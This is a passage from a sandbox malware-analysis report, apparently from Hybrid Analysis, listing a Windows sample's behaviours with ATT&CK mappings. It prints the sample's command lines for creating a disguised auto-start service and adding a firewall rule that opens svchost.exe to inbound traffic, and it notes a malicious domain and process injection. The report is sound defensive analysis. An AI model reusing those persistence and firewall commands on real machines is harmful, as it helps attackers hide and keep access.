"Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00005780-10774-268-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"mpvpepag.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004380)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004380)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000036389bb22ace00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000302eee670c34ee670000000000000000\" - (UID: 00000000-00002572)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"3e61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2227944\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mpvpepag.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mpvpepag.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004380)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004380)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"mpvpepag.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CYGQXRTX\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mpvpepag.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"mpvpepag.exe.67EE4A69.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mpvpepag.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mpvpepag.exe]- [targetUID: 00000000-00005780]\n \"DISMHOST.EXE.67EE5469.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mpvpepag.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has section name .text with entropy \"6.630102803682182\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has section name .text with entropy \"7.972855291312212\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has section name .reloc with entropy \"6.221515464885055\"\n \"mpvpepag.exe\" has section name .text with entropy \"6.630102803682182\"\n \"mpvpepag.exe\" has section name .text with entropy \"7.972855291312212\"\n \"mpvpepag.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE5469.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE5469.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (UID: 00000000-00005780)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005828)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mpvpepag.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005824)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mpvpepag.exe /d\\\\\"C:\\\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00004136)\n Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00006064)\n Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00006040)\n Spawned process \"mpvpepag.exe\" with commandline \"/d\"C:\\\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\"\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004380)\n Spawned process \"svchost.exe\" (UID: 00000000-00002572)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"mpvpepag.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mpvpepag.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mpvpepag.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mpvpepag.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" allocated memory in \"C:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"mpvpepag.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"mpvpepag.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00006040)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004380)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48
https://hybrid-analysis.com/sample/189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48
Hybrid Analysis - Um_unhooking
